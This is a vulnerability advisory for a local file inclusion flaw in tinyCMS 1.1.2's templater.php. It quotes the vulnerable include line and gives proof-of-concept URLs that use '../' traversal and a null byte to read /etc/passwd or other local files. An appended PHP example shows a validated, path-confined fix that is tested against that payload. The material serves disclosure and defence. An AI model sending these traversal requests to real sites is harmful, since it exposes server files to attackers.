tinyCMS version 1.1.2 suffers from a local file inclusion vulnerability in templater.php.
########################################################################################
#
# Name : tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability
# Author : cOndemned [ Dark-Coders ]
# Greetz : Avantura, str0ke, ZaBeaTy, doctor, voo|doo, sid.psycho, irk4z
# Conditions : Magic quotes gpc = Off / Register Globals = On
# Other info : Prior versions probably are vulnerable too
#
########################################################################################
Source of /modules/ZZ_Templater/templater.php (lines 17-19)
[ ... ]
$ftemplatedir = 'templates/'.$config['template'].'/';
include('templates/'.$config['template'].'/data.php'); // <--- LFI
if($tdata['useblocks'] == 1)
[ ... ]
Proof of Concept :
http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../etc/passwd%00
http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../[local_file]%00
Just 4 fun
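
One way to close the include shown in the templater.php excerpt, as an added example (not tinyCMS code and not from the advisory's author): the template name is restricted to a plain directory name and the resolved path is confined to the templates directory. load_template_data() and the temporary fixture are hypothetical, and data.php is assumed to populate $tdata, as the excerpt's later use of $tdata suggests.

```php
<?php
// Added example, not tinyCMS code. Names and the temp fixture are hypothetical.

function load_template_data(string $root, $name): array
{
    // Request input may be an array (config[template][]=x) or carry "../" and
    // NUL bytes, so accept only a plain directory name.
    if (!is_string($name) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        throw new InvalidArgumentException('invalid template name');
    }
    $base = realpath($root);
    $file = realpath($root . '/' . $name . '/data.php');
    // Defence in depth: the canonical path must exist and still sit under
    // $root (catches symlinked template directories).
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('template not found');
    }
    $tdata = [];
    include $file; // fixed suffix, validated directory; assumed to set $tdata
    return $tdata;
}

// Constructed fixture: one valid template in a temporary directory.
$root = sys_get_temp_dir() . '/tpl_demo_' . getmypid();
mkdir($root . '/default', 0700, true);
file_put_contents($root . '/default/data.php', "<?php \$tdata = ['useblocks' => 1];\n");

// Constructed inputs: a valid name, the traversal value from the advisory,
// a relative path, an array parameter, and a name with no directory.
$inputs = ['default', "../../../../etc/passwd\0", '../default', ['x'], 'missing'];
foreach ($inputs as $in) {
    $label = json_encode($in, JSON_UNESCAPED_SLASHES);
    try {
        $t = load_template_data($root, $in);
        echo $label, ' => loaded, useblocks=', $t['useblocks'], "\n";
    } catch (Exception $e) {
        echo $label, ' => rejected: ', $e->getMessage(), "\n";
    }
}

// Remove the fixture.
unlink($root . '/default/data.php');
rmdir($root . '/default');
rmdir($root);
```

On PHP 5.3.4 and later, filesystem functions reject paths containing NUL bytes, and register_globals was removed in PHP 5.4, but the validation above does not depend on either.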